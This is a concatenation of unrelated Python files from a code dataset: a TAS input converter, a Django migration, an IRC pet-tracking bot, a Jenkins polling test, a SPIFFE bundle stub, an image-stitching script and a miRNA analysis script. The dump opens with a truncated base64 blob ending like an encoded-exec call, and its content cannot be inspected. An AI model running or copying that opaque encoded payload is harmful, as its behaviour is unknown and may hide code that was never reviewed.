e566lc5cv7i/nmXUepszAz3iLjLF5lPcVZlZvQ69zEUwJ85kvsOac4cRTCLGpPoYB67Cv4kzpnoa13mtmbaeYupqeMYH+2aLleAIlaUc7oYRHTUdsmoOYGYmpUryAkzOC6FwP7hkFfwre40exFAnWoj3EeCVWFdNGtClF8+zEGu/ZfAvunQrt2SyvroRAvFhbH5ngvyxa4FiPs/RKga3EEYudFGHAAStTHRlINNMFcjPXolxLt2a22sh5TyDdC/NwPp7BCw8BEsLu2v+TjaRHvsu1FEa+IGXvqoJH3fhFg/4dwrVMjQrb+U7jxcsf9EyA550UliIU5VK47wpDSc3Oa2m3jj/TcIPZkwrPUyYQfj+qTiQ2x4mSir8latmnOCMui/Gm0T6fO/Tnaeev4JK2sCd8l1aMZol8XNGeqpvHlMtWj+HaXsgN+r0uXpr8SHz+LxHSQ1qYYOPD5OeJX2KdRMF3M22u5Dmu4PqDOEj1xWZC2Qxt3Mqrp5AlxZvAJucAjbOON2e/UsP/aD73Nhd5tom/0JJxCDLMx8z0V86znFx3Vsv1sLwXY61tIUanYewswP8iXh8d69c2JEnuCx4jZjDWtwknXnvTElwumrkUWaOky15mrN3DEfoLsk2/7V/QKyWZ6bKc+JdN7NtHb6hW4NquucAGxAHLXb6xM4EG+Mu+sHOywcrBpX6XXARLvgqqO/7MF+k8Z5+45lZdPZ+yMFnJb40lGyeVqIFFGN/Jr1yeeBexaecYdvXBNpcq8kWD2+o79pxKtwHpNOFHbDH+ZD
Zy4sgniRlWIWzpmFdg84gtG4LWbXTspkTyJ64szN6ruecT1LNK79c1YvwwiqWdSVGBsPK5LNMDH2N8M0dfUiA4EorGBG3mtnSq1ll71WAj6KWU4E4RKWQb9ftKQB6YVWohzkVLDAfnc5zf+P8psymBW601994SRnugAfK89hcyjdwsSAh6xq/KUbPkE9lN7JBjy4UYW3P2IifEsFr93z7iAikEM4N+lzKBzGFXdTSZe4oMHrRfncl1v4UmVA68qB1dzTlbgX8uw2RWjmF/9fRvesGzxVuVK2V0usXg3vWIjpapazLksVYtFdM3m8NQjFff5CiR1CymHUorckllfgO5eFXSbGYiDaJDcZ1w7IS252VjGabjGiZ83bsiIR7KRWJcjpk36djAPEHGXY8JrteUW2LFTc3iYI2cAS/G9AU2y8SAPApIT11G67RAxa2fOX/EyhKBCXN01KKyrdMnKjJ0v4hx7/X2slo1XkxPXX4LzHQ/64jCbVJzLrY89s3kkxN2AVhYchzxS66+bDKhYyKrLwqlN+WHOnDqdFuY7PvxjwD8O/VB9wlMoLgOg2e5LokTzhejl5ZFGUJInuJxoA1UqrinIqbPRLYV1geJrC6vLissJlSPgFzI+bgQXu2hRMYRoPjednPIlgtTjFi5O8e01hmkTu5aGcgy/JAYKXJRO/7XhS6rXaVyw7h9r15uG98gLpHXrzhLbYRzzQiiavBKy4HspZYtQZShR36Uj3jVg/N7nxteMyIpft6mKyZ7I6ziHEFbjxYY5SxM3O2riZoub8g2TyOR4IONP9ddN5i1ikoxlTjxLdnsUwoo5z5SHYmWF31GKzXG0+bQWG+grfvVCHwxHZZc+m3PY+QQsdj8Fj7ULqBsyecrfy5t/JJN95wX9aCa3QQ6GgwtxaRCHJ0UCSZ7/RLN8kyCCI1hcxBMohjhOsmySVa2VtVgkmlYiEBG9qCMRfstRXIO8BMksAonii7GX6nJb1atwJeV/8t228mF8ihW68OKhklPh3uP6AryZ2OWrm+KWZFlEsIGSStKYCyzPFwbb/6GGmtg/k8OXxFBxONe6T06nLvaNe/zlZD/0gs6dx3dFYFfus0RwVcYx2V6JflPXYd0D13HIjH+vDhmb7vTzcS1dhywZlZG42JSI3sIdZg8VMv9fkJUx3+apAZIvXShebu+Jl5m1dgbU8Wvea92MSroBrsgLrZzOy3j0szwKL25XvMIENYxY2MYBzCNnPseWCoSxmba2Mufw47EmT+Fl17mT7tzZtnhBfCs3gH8D2PvFsg==")))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# This script converts .tas files from EagleIsland TAS tool
# (https://github.com/rjr5838/EagleIslandTAS/) to libTAS input file.
# Just run ./EagleIsland2libTAS path/to/tasfile.tas
import glob
import math
import os
import re
import sys
def main():
    """Entry point: convert the .tas file given as sys.argv[1] to .ltm."""
    EagleIsland2libTAS().convert()
def get_line(label_or_line_number, file):
    """Resolve a TAS line reference to a line number.

    A numeric reference is returned as an int. Otherwise the argument is
    treated as a label and *file* is scanned (from its current position)
    for a matching ``#label`` line; the 1-based offset of that line is
    returned, or ``float('inf')`` when the label is never found.
    """
    try:
        return int(label_or_line_number)
    except ValueError:
        pass
    target = f'#{label_or_line_number}\n'
    for offset, text in enumerate(file, start=1):
        if text == target:
            return offset
    return float('inf')
class EagleIsland2libTAS:
    """Converter from an Eagle Island TAS script to a libTAS input movie.

    Reads the .tas file given on the command line, resolves Read/Add/Skip
    directives, translates each input line into libTAS's pipe-delimited
    per-frame format and writes the result next to the source file with a
    .ltm extension.
    """
    def __init__(self):
        # File handles; opened in convert().
        self.input_file = None
        self.output_file = None
        # "<frame count>,<inputs>" lines, e.g. "10,R,J": group(1) is the
        # frame count, group(2) the comma-prefixed list of actions.
        self.regex_input = re.compile(r'[\s]*([\d]*)((?:,(?:[RLUDJKXCGSQNFO]|[\d.]*))*)')
        # Comment ("#...") or blank lines, which are skipped entirely.
        self.regex_comment = re.compile(r'[\s]*(#|[\s]*$)')
        self.frame_counter = 0
    def convert(self):
        """Run the conversion for the .tas path in sys.argv[1]."""
        self.input_file = open(sys.argv[1], 'r')
        self.output_file = open(f'{os.path.splitext(sys.argv[1])[0]}.ltm', 'w')
        # Perform the actual conversion
        self.export_file(self.input_file)
        self.output_file.close()
    def get_read_data(self, line: str):
        """Parse a Read directive body: "file[,start[,end]]".

        Returns (open file object, lines to skip, last line to read).
        The file may be given as a prefix, in which case the first
        matching "<prefix>*.tas" in the source directory is used.
        Returns (None, None, None) when no file matches.
        """
        index = line.find(',')
        if index > 0:
            file_path = line[0:index]
        else:
            file_path = line[0:-1]
        file_path = f'{os.path.dirname(sys.argv[1])}/{file_path}'
        # Check if full filename was used, get file if it wasn't
        if not os.path.exists(file_path):
            files = [f for f in glob.glob(f'{file_path}*.tas')]
            if not files:
                return None, None, None
            file_path = str(files[0])
        file = open(file_path, 'r')
        skip_lines = 0
        line_len = float('inf')
        # Check how many line numbers were given and convert any labels to lines
        if index > 0:
            index_len = line.find(',', index + 1)
            if index_len > 0:
                start_line = line[index + 1: index_len]
                end_line = line[index_len + 1:-1]
                skip_lines = get_line(start_line, file)
                # NOTE(review): get_line scans from the file's current
                # position, so this second call counts lines *after* the
                # start label; adding skip_lines gives the absolute line
                # for labels. For a numeric end reference this also adds
                # skip_lines -- confirm that offset is intended.
                line_len = skip_lines + get_line(end_line, file)
            else:
                start_line = line[index + 1:-1]
                skip_lines = get_line(start_line, file)
        # NOTE(review): get_line never returns None (it falls back to
        # float('inf')), so this guard appears to be dead code.
        if skip_lines is None:
            skip_lines = 0
        print(f"Reading {line[0:-1]} from {skip_lines} to {line_len}, at frame {self.frame_counter}")
        return file, skip_lines, line_len
    def export_file(self, file, start_line=0, end_line=float('inf')):
        """Translate lines (start_line, end_line] of *file* to the output.

        Recurses into files referenced by Read directives and closes
        *file* when finished.
        """
        file.seek(0)
        cur_line = 0
        skip_line = False
        for line in file:
            cur_line += 1
            line_lower = line.lower()
            if cur_line <= start_line:
                continue
            if cur_line > end_line:
                break
            if skip_line:
                # Previous line was a Skip directive: drop this one.
                skip_line = False
                continue
            if self.regex_comment.match(line):
                continue
            if line_lower.startswith('read'):
                read_path, start, end = self.get_read_data(line[5:])
                if read_path is not None:
                    self.export_file(read_path, start, end)
                continue
            if line_lower.startswith('add'):
                # "Add" prefixes a normal input line; strip the keyword.
                line = line[3:]
            if line_lower.startswith('skip'):
                skip_line = True
                continue
            match = self.regex_input.match(line)
            if match:
                output_keys = ''
                # libTAS controller button order, and the TAS action letter
                # occupying each position ('.' = no action maps there).
                button_order = 'ABXYbgs()[]udlr'
                button_mapping = 'JXCK..S...GUDLR'
                output_buttons = ['.'] * 15
                output_axes = '0:0'
                is_axis = False
                for single_input in match.group(2).split(',')[1:]:
                    if is_axis:
                        # Previous token was 'F': this token is the stick angle.
                        angle = 0 if single_input == '' else float(single_input)
                        # Compute coordinates of the left analog stick to match the
                        # requested angle. Use the max amplitude to get precise values.
                        # We must also compensate for the deadzone which is 0.239532471f
                        rad_angle = math.radians(angle)
                        deadzone = 0.239532471
                        float_x = math.copysign(math.fabs(math.sin(rad_angle)) * (1 - deadzone) + deadzone, math.sin(rad_angle))
                        float_y = math.copysign(math.fabs(math.cos(rad_angle)) * (1 - deadzone) + deadzone, math.cos(rad_angle))
                        x = 32767 * float_x
                        y = -32767 * float_y
                        output_axes = f'{str(int(x))}:{str(int(y))}'
                        is_axis = False
                        continue
                    if single_input == 'F':
                        is_axis = True
                        continue
                    if single_input == 'O':
                        # Presumably the Enter/Return keysym (0xff0d) -- confirm.
                        output_keys = 'ff0d'
                    elif single_input == 'Q':
                        # Presumably the 'r' keysym (0x72) -- confirm.
                        output_keys = '72'
                    else:
                        output_keys = ''
                        # Look at the mapping of the action
                        # NOTE(review): find() returns -1 for letters not in
                        # button_mapping (e.g. 'N'), silently setting the LAST
                        # button via index -1 -- likely latent bug.
                        mapped_index = button_mapping.find(single_input)
                        output_buttons[mapped_index] = button_order[mapped_index]
                # Write the constructed input line, ignore false positive matches
                output_line = f'|{output_keys}|{output_axes}:0:0:0:0:{"".join(output_buttons)}|.........|\n'
                try:
                    for n in range(int(match.group(1))):
                        self.frame_counter += 1
                        self.output_file.write(output_line)
                except ValueError:
                    print(f"Ignoring {line[0:-1]}")
        print(f"Read {cur_line - start_line} lines from {file.name}")
        file.close()
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the discussion models: Attachment, DiscussionThread and Reply.

    Auto-generated Django migration; the schema below is a historical record
    and should not normally be edited after it has been applied.
    """
    dependencies = [
        ('login', '0012_auto_20160529_0607'),
    ]
    operations = [
        migrations.CreateModel(
            name='Attachment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # NOTE(review): bytes literal and leading slash in upload_to
                # look unintentional (absolute path) — confirm before reuse.
                ('uploaded_file', models.FileField(upload_to=b'/user-attachments/')),
                ('size', models.FloatField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='DiscussionThread',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=100, blank=True)),
                ('description', models.CharField(max_length=1000, blank=True)),
                ('posted_at', models.DateField()),
                ('no_of_replies', models.IntegerField(null=True, blank=True)),
                ('no_of_views', models.IntegerField(null=True, blank=True)),
                ('posted_by', models.ForeignKey(to='login.UserProfile')),
            ],
        ),
        migrations.CreateModel(
            name='Reply',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('posted_at', models.DateField()),
                # NOTE(review): max_length is a bytes literal b'1000' rather
                # than an int — tolerated by old Django/py2 but verify.
                ('text', models.CharField(max_length=b'1000', null=True)),
                ('posted_by', models.ForeignKey(to='login.UserProfile')),
                ('thread', models.ForeignKey(to='discussion.DiscussionThread')),
            ],
        ),
        migrations.AddField(
            model_name='attachment',
            name='reply',
            field=models.ForeignKey(to='discussion.Reply'),
        ),
    ]
|
nilq/baby-python
|
python
|
import time
def pets_init_db(db=None):
    """Create the ``pets`` and ``pets_pics`` tables if they do not exist.

    :param db: database handle exposing ``execute`` (supplied by the bot
        framework).
    """
    db.execute("create table if not exists pets"
        "(id autoincrement, channel, server, pet_name, owner, species, breed, sex, deceased default 0, added_by, added_on real, modified_by, modified_on real, is_deleted default 0, "
        "primary key (id))")
    # Bug fix: this second execute() call was missing its closing
    # parenthesis in the original, which made the whole module a
    # SyntaxError.
    db.execute("create table if not exists pets_pics"
        "(id autoincrement, pet_id, added_by, url, is_deleted default 0, "
        "primary key (id),"
        "foreign key(pet_id) references pets(id))")
@hook.singlethread
def pets_crond(db=None):
    # Periodic hook: only ensures the pets tables exist.
    pets_init_db(db)
@hook.command
def pets(inp, nick='', chan='', server='', db=None):
    # Look up a pet (and its pictures) by "<owner> <pet_name>".
    inputs = inp.split(" ")
    user = inputs[0].lower()
    pet_name = inputs[1].lower()
    # NOTE(review): the query result is never returned or printed, so this
    # command currently produces no user-visible output — confirm intent.
    result = db.execute("select pets.pet_name, pets.owner, pets.species, pets.breed, pets.sex, pets_pics.url "
                        "from pets join pets_pics on pets_pics.pet_id = pets.id "
                        "where pets.owner = ? and pets.pet_name = ?", (user, pet_name))
@hook.command
def pets_add(inp, nick='', chan='', server='', db=None, autohelp=True):
    """.pets_add pet_name,dog_or_cat_or_bird,breed_of_animal,m_or_f"""
    # Bug fixes vs. the original:
    #  * str has no .trim(); use .strip() and KEEP the results (str methods
    #    return new strings, they do not mutate in place).
    #  * `owner` was never defined; the pet is recorded as owned by the
    #    calling nick (presumably the caller adds their own pet — TODO confirm).
    #  * the INSERT was missing the `values` keyword.
    inputs = [part.strip() for part in inp.split(",")]
    pet_name = inputs[0].title()
    species = inputs[1].title()
    breed = inputs[2].title()
    sex = inputs[3].upper()
    owner = nick
    db.execute("insert into pets(channel, server, pet_name, owner, species, breed, sex, added_by, added_on, is_deleted) "
               "values(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
               (chan, server, pet_name, owner, species, breed, sex, nick, time.time(), 0))
@hook.command
def pets_update(inp, nick='', db=None, autohelp=True):
    """.pets_update pet_id,pet_name,dog_or_cat_or_bird,breed_of_animal,m_or_f"""
    # Bug fixes vs. the original:
    #  * str has no .trim(); strip each field and keep the result.
    #  * the parameter tuple was missing `pet_id` (the WHERE placeholder) and
    #    referenced an undefined `owner`; owner is not part of this command's
    #    input, so it is no longer overwritten.
    #  * the db.execute(...) call was missing its closing parenthesis.
    inputs = [part.strip() for part in inp.split(",")]
    pet_id = int(inputs[0])
    pet_name = inputs[1].title()
    species = inputs[2].title()
    breed = inputs[3].title()
    sex = inputs[4].upper()
    db.execute("update pets set pet_name = ?, species = ?, breed = ?, sex = ?, modified_by = ?, modified_on = ? where id = ?",
               (pet_name, species, breed, sex, nick, time.time(), pet_id))
@hook.command
def pets_add_pic(inp, nick='', db=None, autohelp=True):
    """.pets_add_pic pet_id,url or .pets_add_pic username,pet_name,url"""
    # Bug fixes vs. the original:
    #  * str has no .trim(); strip each field and keep the result.
    #  * in the 3-argument form the URL is the third field, but the insert
    #    always used inputs[1] (the pet name); the URL is now the last field
    #    in both forms.
    inputs = [part.strip() for part in inp.split(",")]
    pet_id = -1
    url = inputs[-1]  # URL is the final comma-separated field in both forms
    if len(inputs) == 2:
        pet_id = int(inputs[0])
    elif len(inputs) == 3:
        result = db.execute("select id from pets where lower(owner) = ? and lower(pet_name) = ?",
                            (inputs[0].lower(), inputs[1].lower())).fetchone()
        if result:
            pet_id = result[0]
        else:
            return u"Couldn't find that pet in the database!"
    if pet_id != -1:
        db.execute("insert into pets_pics(pet_id, added_by, url, is_deleted) "
                   "values(?, ?, ?, ?)", (pet_id, nick, url, 0))
    else:
        return u"Something got messed up and couldn't insert picture into database. Perhaps that pet id doesn't exist."
|
nilq/baby-python
|
python
|
import os
import sys
import json
import urllib2
import base64
import time
from fleet.utility import *
from fleet.utility import LOG as L
from fleet.script import testcase_normal
class TestCase(testcase_normal.TestCase):
    """Poll a Jenkins job; sleep while it is green, otherwise trigger a build.

    Python 2 code (urllib2, base64.encodestring).
    """
    def __init__(self, *args, **kwargs):
        super(TestCase, self).__init__(*args, **kwargs)
    @classmethod
    def setUpClass(cls):
        L.info("*** Start TestCase : %s *** " % __file__)
    def test_step_1(self):
        # Query the job's JSON API; the job is "green" when the latest build
        # number equals the last stable build number.
        result = False
        try:
            username = self.get("args.userid")
            token = self.get("args.password")
            # NOTE(review): the token query parameter is filled with
            # args.job, not the `token` read above — confirm intended.
            url = "%s/job/%s/api/json?token=%s" % (self.get("args.url"), self.get("args.job"), self.get("args.job"))
            L.info(url)
            request = urllib2.Request(url)
            # HTTP basic auth header (encodestring adds a trailing newline).
            base64string = base64.encodestring('%s:%s' % (username, token)).replace('\n', '')
            request.add_header("Authorization", "Basic %s" % base64string)
            r = urllib2.urlopen(request)
            root = json.loads(r.read())
            latest = int(root['lastBuild']['number'])
            success = int(root['lastStableBuild']['number'])
            L.debug("Latest Number : %d" % latest )
            L.debug("Success Number : %d" % success )
            result = latest == success
        finally:
            # NOTE(review): if urlopen raised, `r` is unbound here and this
            # close() masks the original error with a NameError — verify.
            r.close()
        if result:
            # Job is green: wait the configured timeout before finishing.
            timeout = int(self.get("args.timeout"))
            L.debug("Timeout : %d " % timeout)
            time.sleep(timeout)
        else:
            # Job is not green: kick off a new build and expect HTTP 201.
            L.debug("Retry.")
            try:
                url2 = "%s/job/%s/build?token=%s&delay=0sec" % (self.get("args.url"), self.get("args.job"), self.get("args.job"))
                L.info(url2)
                request2 = urllib2.Request(url2)
                base64string2 = base64.encodestring('%s:%s' % (username, token)).replace('\n', '')
                request2.add_header("Authorization", "Basic %s" % base64string2)
                r2 = urllib2.urlopen(request2)
                L.debug("HTTP Status Code : %d" % r2.getcode())
                self.assertTrue(r2.getcode() == 201)
            finally:
                # NOTE(review): same unbound-variable hazard as above for r2.
                r2.close()
    @classmethod
    def tearDownClass(cls):
        L.info("*** End TestCase : %s *** " % __file__)
|
nilq/baby-python
|
python
|
"""
This module manages JwtBundleSet objects.
"""
from typing import Mapping
from pyspiffe.bundle.jwt_bundle.jwt_bundle import JwtBundle
from pyspiffe.spiffe_id.trust_domain import TrustDomain
class JwtBundleSet(object):
    """JwtBundleSet is a set of JWTBundles objects, keyed by trust domain."""

    def __init__(self, bundles: Mapping[TrustDomain, JwtBundle]) -> None:
        """Creates a new initialized with the given JWT bundles.

        Args:
            bundles: A set of JwtBundles to initialize the JwtBundleSet.
        """
        # Fix: dropped the dead `pass` statement that followed this line.
        self._bundles = bundles

    def add(self, jwt_bundle: JwtBundle):
        """Adds a new bundle into the set.

        If a bundle already exists for the trust domain, the existing bundle is
        replaced.

        Args:
            jwt_bundle: The new JwtBundle to add.
        """
        # Idiom fix: NotImplementedError is the conventional marker for an
        # unimplemented method; it subclasses Exception, so existing callers
        # that caught Exception keep working.
        raise NotImplementedError('not implemented.')

    def get_jwt_bundle_for_trust_domain(self, trust_domain: TrustDomain) -> JwtBundle:
        """Returns the JWT bundle of the given trust domain.

        Args:
            trust_domain: The TrustDomain to get a JwtBundle.

        Returns:
            A JwtBundle for the given TrustDomain.
        """
        raise NotImplementedError('not implemented.')
|
nilq/baby-python
|
python
|
from pathlib import Path
import cv2
import matplotlib.pyplot as plt
import numpy as np
from scipy.spatial import distance
def match_keypoints(featuresA, featuresB):
    """Return the Lowe-ratio-filtered matches between two descriptor sets."""
    matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=False)
    knn_pairs = matcher.knnMatch(featuresA, featuresB, 2)
    LOWE_RATIO = 0.75
    # Keep a candidate only when it is clearly better than the runner-up
    # (Lowe's ratio test).
    return [best for best, runner_up in knn_pairs
            if best.distance < runner_up.distance * LOWE_RATIO]
def remove_black_border(img):
    """Crop `img` to the bounding box of its non-black content."""
    grayscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    _, mask = cv2.threshold(grayscale, 1, 255, cv2.THRESH_BINARY)
    outlines, _hierarchy = cv2.findContours(
        mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE
    )
    left, top, width, height = cv2.boundingRect(outlines[0])
    return img[top:top + height, left:left + width]
def get_boundary_points(img):
    """Return a simplified polygon approximating the outline of the
    non-black region of `img` (cv2.approxPolyDP output, shape (N, 1, 2))."""
    grayscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    _, mask = cv2.threshold(grayscale, 1, 255, cv2.THRESH_BINARY)
    outlines, _hierarchy = cv2.findContours(
        mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE
    )
    # A tolerance proportional to the contour perimeter keeps the
    # simplification scale-independent.
    tolerance = 0.005 * cv2.arcLength(outlines[0], True)
    return cv2.approxPolyDP(outlines[0], tolerance, True)
def order_points(pts):
    """Order four 2D points as (top-left, top-right, bottom-right, bottom-left).

    Takes a (4, 2) array-like; returns a float32 numpy array.
    """
    by_x = pts[np.argsort(pts[:, 0]), :]
    left_pair = by_x[:2, :]
    right_pair = by_x[2:, :]
    top_left, bottom_left = left_pair[np.argsort(left_pair[:, 1]), :]
    # The right-hand point farthest from the top-left corner lies on the
    # diagonal, i.e. it is the bottom-right one.
    distances = distance.cdist(top_left[np.newaxis], right_pair, "euclidean")[0]
    bottom_right, top_right = right_pair[np.argsort(distances)[::-1], :]
    return np.array([top_left, top_right, bottom_right, bottom_left], dtype="float32")
def four_point_transform(image, pts):
    """Warp the quadrilateral `pts` in `image` to an axis-aligned rectangle."""
    corners = order_points(np.array(pts, dtype="float32"))
    top_left, top_right, bottom_right, bottom_left = corners
    # Output size: the longer of each pair of opposite edges.
    out_width = int(max(np.linalg.norm(bottom_right - bottom_left),
                        np.linalg.norm(top_right - top_left)))
    out_height = int(max(np.linalg.norm(top_right - bottom_right),
                         np.linalg.norm(top_left - bottom_left)))
    target = np.array(
        [[0, 0], [out_width - 1, 0], [out_width - 1, out_height - 1], [0, out_height - 1]],
        dtype="float32",
    )
    target = order_points(target)
    transform = cv2.getPerspectiveTransform(corners, target)
    return cv2.warpPerspective(
        image, transform, (out_width, out_height), flags=cv2.INTER_LINEAR
    )
def merge_img(queryImg, trainImg):
    """Stitch `trainImg` onto `queryImg`.

    Estimates a homography (ORB features + Lowe-ratio matches + RANSAC)
    mapping trainImg into queryImg's frame, warps trainImg, pastes queryImg
    on top, and crops the black border. Returns the stitched image.
    """
    trainImg_gray = cv2.cvtColor(trainImg, cv2.COLOR_RGB2GRAY)
    queryImg_gray = cv2.cvtColor(queryImg, cv2.COLOR_RGB2GRAY)
    descriptor = cv2.ORB_create()
    kpsA, featuresA = descriptor.detectAndCompute(trainImg_gray, None)
    kpsB, featuresB = descriptor.detectAndCompute(queryImg_gray, None)
    matches = match_keypoints(featuresA, featuresB)
    # ? construct the two sets of points
    ptsA = np.float32([kpsA[m.queryIdx].pt for m in matches])
    ptsB = np.float32([kpsB[m.trainIdx].pt for m in matches])
    # ? estimate the homography between the sets of points
    H, _ = cv2.findHomography(ptsA, ptsB, cv2.RANSAC, ransacReprojThreshold=4)
    # Canvas large enough to hold both images in either direction.
    height = trainImg.shape[0] + queryImg.shape[0]
    width = trainImg.shape[1] + queryImg.shape[1]
    # NOTE(review): this zeros canvas is immediately overwritten by the
    # warpPerspective result below — dead assignment, kept as-is.
    result = np.zeros((height, width, 3), dtype=np.uint8)
    result = cv2.warpPerspective(trainImg, H, (width, height))
    result[0 : queryImg.shape[0], 0 : queryImg.shape[1]] = queryImg
    result = remove_black_border(result)
    return result
# def display_result(img1, img2, img12):
# plt.figure(figsize=(25, 9))
# plt.subplot(2, 2, 1)
# plt.imshow(img1)
# plt.title("Image 1", fontsize=16)
# plt.axis("off")
# plt.subplot(2, 2, 2)
# plt.imshow(img2)
# plt.title("Image 2", fontsize=16)
# plt.axis("off")
# plt.subplot(2, 1, 2)
# plt.imshow(img12)
# plt.title("Merged image", fontsize=16)
# plt.axis("off")
# plt.subplot(2, 1, 2)
# plt.imshow(img12)
# plt.title("Merged + warped image", fontsize=16)
# plt.axis("off")
# plt.show()
def display_result(img1, img2, img3, img4):
    """Show the two inputs and the merged/warped results in a 2x2 grid."""
    titles = ("Image 1", "Image 2", "Merged image", "Merged + warped image")
    plt.figure(figsize=(25, 9))
    for position, (img, title) in enumerate(zip((img1, img2, img3, img4), titles), start=1):
        plt.subplot(2, 2, position)
        plt.imshow(img)
        plt.title(title, fontsize=16)
        plt.axis("off")
    plt.show()
def mainIndividual(images):
    """Stitch each consecutive pair of images independently and display it."""
    for i in range(1, len(images)):
        image_merged = merge_img(images[i - 1], images[i])
        points = get_boundary_points(image_merged)
        print(f"Simplified contour has {len(points)} points")
        # Only 4-6 vertex outlines are handled; anything else aborts the run.
        if len(points) < 4 or len(points) > 6:
            print(f"{i}th image has {len(points)} points")
            break
        elif len(points) == 4:
            warped = four_point_transform(image_merged, points)
        elif len(points) == 5:
            # NOTE(review): vertex subsets [0,1,3,4] / [0,1,3,5] below are a
            # heuristic pick of the four "corner-most" vertices — confirm they
            # hold for other datasets.
            warped = four_point_transform(
                image_merged, [points[i][0] for i in [0, 1, 3, 4]]
            )
        elif len(points) == 6:
            warped = four_point_transform(
                image_merged, [points[i][0] for i in [0, 1, 3, 5]]
            )
        display_result(images[i - 1], images[i], image_merged, warped)
def mainCombined(images):
    """Stitch images cumulatively: each result becomes the next base image."""
    image_last = images[0]
    for i in range(1, len(images)):
        image_merged = merge_img(image_last, images[i])
        points = get_boundary_points(image_merged)
        print(f"Simplified contour has {len(points)} points")
        # Only 4-6 vertex outlines are handled; anything else aborts the run.
        if len(points) < 4 or len(points) > 6:
            print(f"{i}th image has {len(points)} points")
            break
        elif len(points) == 4:
            warped = four_point_transform(image_merged, points)
        elif len(points) == 5:
            # NOTE(review): same heuristic vertex subsets as mainIndividual.
            warped = four_point_transform(
                image_merged, [points[i][0] for i in [0, 1, 3, 4]]
            )
        elif len(points) == 6:
            warped = four_point_transform(
                image_merged, [points[i][0] for i in [0, 1, 3, 5]]
            )
        display_result(image_last, images[i], image_merged, warped)
        # Carry the rectified panorama forward as the next stitching base.
        image_last = warped
if __name__ == "__main__":
    # Load every .jpeg in the dataset directory (sorted by filename) and run
    # the pairwise stitching demo.
    IMG_DIR = "dataset/3"
    filepaths = sorted(Path(IMG_DIR).glob("*.jpeg"))
    images = [cv2.imread(str(path)) for path in filepaths]
    mainIndividual(images)
    # mainCombined(images)
    # img1 = cv2.imread("dataset/3/0.jpeg")
    # img2 = cv2.imread("dataset/3/1.jpeg")
    # img12 = merge_img(img1, img2)
    # display_result(img1, img2, img12)
    # img = image_merged.copy()
    # print(points)
    # for [[x, y]] in points:
    #     cv2.putText(
    #         img,
    #         f"{x}, {y}",
    #         (x, y),
    #         cv2.FONT_HERSHEY_SIMPLEX,
    #         1,
    #         (255, 0, 0),
    #         2,
    #     )
    # cv2.imshow("image", img)
    # cv2.waitKey(0)
    # cv2.destroyAllWindows()
|
nilq/baby-python
|
python
|
import sys

# Read the number of test cases from the first line of stdin and greet each
# judge in turn. Fix: the original rebound the builtin `input` to
# sys.stdin.readline; use an explicitly named reader instead of shadowing it.
read_line = sys.stdin.readline
for case_number in range(1, int(read_line()) + 1):
    print("Hello World, Judge {}!".format(case_number))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# encoding: utf-8
'''
mirna.py
Created by Joan Smith
on 2019-8-29.
Copyright (c) 2019 All rights reserved.
'''
import pandas as pd
import numpy as np
import argparse
import sys
import os
import biomarker_survival as surv
from .zscore_common import ZscoreCommon
def get_options(argv):
    """Parse command-line options for the miRNA zscore run.

    Args:
        argv: Argument list to parse, or None to fall back to sys.argv.
            Bug fix: the original called parser.parse_args() with no
            arguments, silently ignoring this parameter.

    Returns:
        Tuple (mirna_path, tcga_cdr_path, output_directory, parallel).
    """
    parser = argparse.ArgumentParser(description='Get mirna file, clinical file, optional output dir')
    parser.add_argument('-m', action='store', dest='mirna')
    parser.add_argument('-c', action='store', dest='tcga_cdr')
    parser.add_argument('-p', action='store', dest='parallel', type=int)
    parser.add_argument('-o', action='store', dest='output_directory', default='.')
    ns = parser.parse_args(argv)  # fix: honor the argv argument
    return ns.mirna, ns.tcga_cdr, ns.output_directory, ns.parallel
def prep_data(mirna_path, extra_data=None):
    """Load a miRNA expression table, log2-transform and clip negatives.

    Drops the 'Correction' column, treats '???' as NaN, then returns the
    transposed table (samples as rows) with sample IDs in an 'index' column.
    `extra_data` is accepted for interface compatibility and unused.
    """
    raw = pd.read_csv(mirna_path, header=0, na_values='???', index_col=0)
    expression = raw.drop('Correction', axis=1)
    # log2 of raw counts; values below 1 would go negative, so clip at 0.
    clipped = expression.apply(np.log2).clip(lower=0)
    return clipped.T.reset_index()
def ctype_cleaning(df, ctype, ctype_ctype_clinical):  # ctype_clinical unused
    """Normalize patient identifiers for one cancer type.

    Filters non-01 samples where applicable, derives the patient identifier,
    and reindexes the frame on it (dropping the raw 'index' column).
    """
    cleaned = surv.maybe_clear_non_01s(df, 'index', ctype)
    cleaned = surv.add_identifier_column(cleaned, 'index')
    return cleaned.set_index('identifier').drop('index', axis=1)
def metadata(mirna, clinical):
    """Return ZscoreCommon metadata for the miRNA and clinical inputs."""
    mirna_zscores = ZscoreCommon(prep_data, ctype_cleaning)
    return mirna_zscores.metadata(mirna, clinical)
def zscores(mirna, clinical, outdir, parallel, additional_vars={}):
    """Run the per-cancer-type zscore analysis and write a pan-cancer CSV.

    Results are written into `outdir`; the pan-cancer summary goes to
    outdir/pancan.csv.
    """
    # NOTE(review): mutable default argument `additional_vars={}` — it is only
    # read here, but a None sentinel would be safer; left unchanged to
    # preserve the interface.
    mirna_zscores = ZscoreCommon(prep_data, ctype_cleaning)
    mirna_zscores.zscores(mirna, clinical, outdir, parallel_workers=parallel, additional_vars=additional_vars)
    pancan_df = surv.pancan(outdir, multivariate=(len(additional_vars) > 0))
    pancan_df.to_csv(os.path.join(outdir, 'pancan.csv'), index_label='gene')
def main(argv=None):
    """Command-line entry point: parse options and run the zscore analysis."""
    mirna, clinical, outdir, parallel = get_options(argv)
    zscores(mirna, clinical, outdir, parallel)
